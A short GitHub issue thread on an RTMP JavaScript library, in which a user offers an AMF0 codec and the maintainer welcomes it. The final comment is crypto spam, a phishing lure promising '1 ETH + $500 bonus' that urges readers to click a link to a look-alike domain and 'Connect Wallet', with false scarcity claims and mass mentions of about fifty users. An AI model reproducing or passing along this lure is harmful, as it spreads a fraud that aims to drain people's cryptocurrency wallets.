### ISSUE TITLE
Not an issue

### ISSUE THREAD

**Issue by ghost** [arturomtm/librtmpjs#1]
Hello.

I just wanted to let you know that I'm currently creating an AMF0 library for my ByteArray implementation in Node. It may be interesting for you. I haven't updated my repository yet but I'll do it somewhere this week.

**Comment by arturomtm** [comment]
I'll take a look, if course. It is really interesting not to bound to a certain amf library, as this repo does, but to be open to a wide range of amf codecs. Thank you!

**Comment by ghost** [comment]
I removed it out of my repo as it's quite useless nowadays, but you can find it in the commits. Please note that this doesn't support references.

**Comment by closerhan** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
vitustockholm, @Akido22, @ethanliew, @Jisen, @FuDefi, @jam1729, @naik-pramod, @anaghar05, @SvenVandenbrande, @danish31, @kaiocesar, @Cymatical, @boppbo, @ushakrishnan, @jonnydubowsky, @mass-min, @asishadhikari, @mauricioarauujo, @ardacetinkaya, @Deathcrash, @Japangor, @singlr, @AmrouOUNI, @Insiyaa, @Ch-Ayushman-Patro, @BalogunMalikO, @EuLeEr, @juno-yu, @lau32, @manikyabard, @leokabayashi, @brannondorsey, @jmhierro, @ktpm489, @malirezai, @sbtobb, @ChrisMissal, @diop, @anhthii, @sebastiangj, @epappas, @viannaandreBR, @ayakimov, @fuevaco, @shawntsai, @Selny, @meission, @leomicheloni, @blugord, @blind-panther
